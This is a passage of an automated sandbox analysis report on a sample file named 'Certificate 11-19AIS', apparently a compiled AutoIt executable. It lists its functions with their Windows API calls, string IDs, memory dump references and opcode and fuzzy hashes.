                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008196A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: 1e91ec5912bf631409e912ee46f78cfff8ba4e804ac911eb9bd8d70acb3ec419
                                                                              • Instruction ID: fa17beda6926d17edcd214b21535a0fd42972e05b3fd301dfa81b431cb970ebd
                                                                              • Opcode Fuzzy Hash: 1e91ec5912bf631409e912ee46f78cfff8ba4e804ac911eb9bd8d70acb3ec419
                                                                              • Instruction Fuzzy Hash: 8B115871500208AAEB109E68AC64EEB3B6EFF253A8F104714F9A9D71E0C735DC919760
                                                                              Function 007F5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F52D5
                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007F52F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: 28c5b3d77798498480ccf019cb2091719c8cb748276b041ec11392ea442b0ef5
                                                                              • Instruction ID: 1659d3b9efee780f59226176bb13ae072c8daf1992994d3957b923ef1b7dd812
                                                                              • Opcode Fuzzy Hash: 28c5b3d77798498480ccf019cb2091719c8cb748276b041ec11392ea442b0ef5
                                                                              • Instruction Fuzzy Hash: 4511D072A01628ABDB20DA9CD948BBD77B8BF05798F040125EB05E7394D3B4ED04C791
                                                                              Function 00804D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00804DF5
                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00804E1E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$OpenOption
                                                                              • String ID: <local>
                                                                              • API String ID: 942729171-4266983199
                                                                              • Opcode ID: ff3db4b1cf0c3c1220ab5f18d36826b5396cdf1e6abb95a04610edb76591d1d0
                                                                              • Instruction ID: 24bc5c2f0b287d8971544d568c64221709e4254355f00aa8651fd6d4c311a400
                                                                              • Opcode Fuzzy Hash: ff3db4b1cf0c3c1220ab5f18d36826b5396cdf1e6abb95a04610edb76591d1d0
                                                                              • Instruction Fuzzy Hash: FE11C2B0541225FBDB658F51CC89EFBFBA8FF06764F10922AFA15D6180D3705954C6E0
                                                                              Function 0080A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0080A84E
                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 0080A88B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: htonsinet_addr
                                                                              • String ID: 255.255.255.255
                                                                              • API String ID: 3832099526-2422070025
                                                                              • Opcode ID: cf10b1ba08b318ba8af06e49d78115748ae3965b4231104833a288e7e4a845a5
                                                                              • Instruction ID: 412bbd13a0150421c4231f16f9b9ed7cb7186ff29ff3e264256945ab7ce6d69d
                                                                              • Opcode Fuzzy Hash: cf10b1ba08b318ba8af06e49d78115748ae3965b4231104833a288e7e4a845a5
                                                                              • Instruction Fuzzy Hash: 5B01D275200308ABCB199F68DC8AFADB364FF44314F10852AF516EB2D1DB75E8068752
                                                                              Function 007EB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007EB7EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: 5152ff2bf708771dabe8f226fc5de03a2a01d69bd549526923b1fc1805538722
                                                                              • Instruction ID: 075660701f397453cdef9f1e7b3fc2a50071512ccb2570cc9d3efa03c754748e
                                                                              • Opcode Fuzzy Hash: 5152ff2bf708771dabe8f226fc5de03a2a01d69bd549526923b1fc1805538722
                                                                              • Instruction Fuzzy Hash: 3601B1B1642154EBCB05EBA4CC56AFF33A9BF4A350B04061DF472A72D2EB785D188B90
                                                                              Function 007EB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 007EB6EB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: 7eeae6a4cba9140c51f94d660dd3d2f5cf8be6db63e52389b16c0a45a7122248
                                                                              • Instruction ID: eb96c948280d578ea793ac66b4857d8a0e5eb51067ba5f436f46dc4be0df904a
                                                                              • Opcode Fuzzy Hash: 7eeae6a4cba9140c51f94d660dd3d2f5cf8be6db63e52389b16c0a45a7122248
                                                                              • Instruction Fuzzy Hash: 2801A7B1642144EBCB05EBA5C957FFF77B89F09344F100019B512B32C1DB589E1887B5
                                                                              Function 007EB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 007EB76C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 3850602802-1403004172
                                                                              • Opcode ID: 5a0530ab0306e95bf6e09631c5aeaf0d68c342a07c17447d9c75ff4e4ece8f35
                                                                              • Instruction ID: 5d992c88eab948f0317267733fb93f6589ffd667521ab23700afac443178f10f
                                                                              • Opcode Fuzzy Hash: 5a0530ab0306e95bf6e09631c5aeaf0d68c342a07c17447d9c75ff4e4ece8f35
                                                                              • Instruction Fuzzy Hash: 7701D6B5642154EBCB01E7A4C907FFF77AC9B49340F10401AB411B3292DB6C9E1987B5
                                                                              Function 007B4024 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadImageW.USER32(007B0000,00000063,00000001,00000010,00000010,00000000), ref: 007B4048
                                                                              • EnumResourceNamesW.KERNEL32(00000000,0000000E,007F67E9,00000063,00000000,76090280,?,?,007B3EE1,?,?,000000FF), ref: 008241B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: EnumImageLoadNamesResource
                                                                              • String ID: >{
                                                                              • API String ID: 1578290342-1646470997
                                                                              • Opcode ID: f4ae2f792f75b409287471ee31dfa63eede207f55985a120807ab46b0bfc052b
                                                                              • Instruction ID: 4aac537566511449c83ee82ce81fdf50296566d7ec015b6329db55b15d595a71
                                                                              • Opcode Fuzzy Hash: f4ae2f792f75b409287471ee31dfa63eede207f55985a120807ab46b0bfc052b
                                                                              • Instruction Fuzzy Hash: 52F06771650324B7EA205B1ABC4EFD23BADF754BB5F10051AF228AA5E0D2F4D0C08AA0
                                                                              Function 007F7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp
                                                                              • String ID: #32770
                                                                              • API String ID: 2292705959-463685578
                                                                              • Opcode ID: 594a1dcfc0bb3815cca3a067177b64d66f13cee0d2d40c7fec6884eaa8892110
                                                                              • Instruction ID: e8514b556dbb54fc0708aa08b9db72d2a8435240be27621af2e2cba1b680598a
                                                                              • Opcode Fuzzy Hash: 594a1dcfc0bb3815cca3a067177b64d66f13cee0d2d40c7fec6884eaa8892110
                                                                              • Instruction Fuzzy Hash: 7FE0D877A0432867D720EAE5EC0AE97FBACFBA5760F010116F916D7241E678E641C7E0
                                                                              Function 007EA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007EA63F
                                                                                • Part of subcall function 007D13F1: _doexit.LIBCMT ref: 007D13FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Message_doexit
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 1993061046-4017498283
                                                                              • Opcode ID: d276060caa58edc4aad7c2c89a2a84770034a42d9e262436117de02df4463c88
                                                                              • Instruction ID: 3a98e4b1bc32c5b71082f0920aef1971b968dda1f8ead78c49135d585af49367
                                                                              • Opcode Fuzzy Hash: d276060caa58edc4aad7c2c89a2a84770034a42d9e262436117de02df4463c88
                                                                              • Instruction Fuzzy Hash: DFD02B313C4B1873C21437A83C0FFC43648DB55BA5F04001AFB08D62C249EE955001D9
                                                                              Function 0082AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 0082ACC0
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0082AEBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryFreeLibrarySystem
                                                                              • String ID: WIN_XPe
                                                                              • API String ID: 510247158-3257408948
                                                                              • Opcode ID: 96bb95bc3864f38b8a8faf16a0602944445289c715a08bb0e38bd3b786b3d254
                                                                              • Instruction ID: c3b9bc95bcea5fe8e260cd44156bc369b6976e9ac370ff05a1b786245d33e35c
                                                                              • Opcode Fuzzy Hash: 96bb95bc3864f38b8a8faf16a0602944445289c715a08bb0e38bd3b786b3d254
                                                                              • Instruction Fuzzy Hash: F8E0C970C006199FCB15DBA9E984AEDB7B9FF88301F148495E556F2160DB705A84DF22
                                                                              Function 00818698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008186A2
                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008186B5
                                                                                • Part of subcall function 007F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 5aac3d6c05099e74ceb3647aa8400a704c16020662b525234c0c3f0182cf7705
                                                                              • Instruction ID: 19d39d4a5b6ce1ba48bdd0df5a8b81189957aaea2c506796abc2f656afacec1d
                                                                              • Opcode Fuzzy Hash: 5aac3d6c05099e74ceb3647aa8400a704c16020662b525234c0c3f0182cf7705
                                                                              • Instruction Fuzzy Hash: 5AD0C971784318A7E2686770AC0FFD66A18AB54B11F110815B75AAA2D0C9A4A950C654
                                                                              Function 008186CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008186E2
                                                                              • PostMessageW.USER32(00000000), ref: 008186E9
                                                                                • Part of subcall function 007F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 28ab949d916fcb4e1e0a3ec1d57515462ad558c3d9d0cfe75139d376c7388763
                                                                              • Instruction ID: d08dcb8e5284b8968f51599d78cde043dd0d68df1138d01ab4ff309243bd08b3
                                                                              • Opcode Fuzzy Hash: 28ab949d916fcb4e1e0a3ec1d57515462ad558c3d9d0cfe75139d376c7388763
                                                                              • Instruction Fuzzy Hash: 9BD0C971785318ABE2686770AC0FFC66A18AB54B11F510815B756EA2D0C9A4A950C654